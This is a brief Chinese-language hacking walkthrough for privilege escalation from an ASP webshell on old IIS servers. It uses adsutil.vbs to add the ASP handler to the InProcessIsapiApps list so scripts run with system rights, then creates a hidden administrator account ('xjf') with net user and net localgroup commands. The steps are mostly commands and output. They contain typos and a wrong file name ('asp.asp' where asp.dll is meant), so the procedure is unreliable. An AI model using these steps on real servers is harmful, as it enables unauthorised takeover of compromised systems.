把解释asp脚本的 C:\WINNT\System32\inetsrv\asp.dll
这个ISAPI程序添加到/LM/W3SVCInProcessIsapiApps里面
首先我看看iis的配置。和asp木马的权限

adsutil.vbs get /W3SVC/InProcessIsapiApps
先用下面命令取得当前的InProcessIsapiApps列表：
c:\winnt\sytem32\inetsrv>cscript.exe adsutil.vbs get /W3SVC/InProcessIsapiApps
inprocessisapiapps :(LIST) (5 Items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
---没有asp
然后把asp.dll加进/LM/W3SVCInProcessIsapiApps里面
c:\winnt\sytem32\inetsrv>adsutil.vbs set /W3SVC/InProcessIsapiApps
"c:\winnt\system32\inetsrv\asp.asp"
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"

现在看看asp木马的权限
我们加一个用户xjf并提升为管理员看看.
net user xjf ***** /add
net lcoalgroup administrators xjf /add----哈哈...成功了.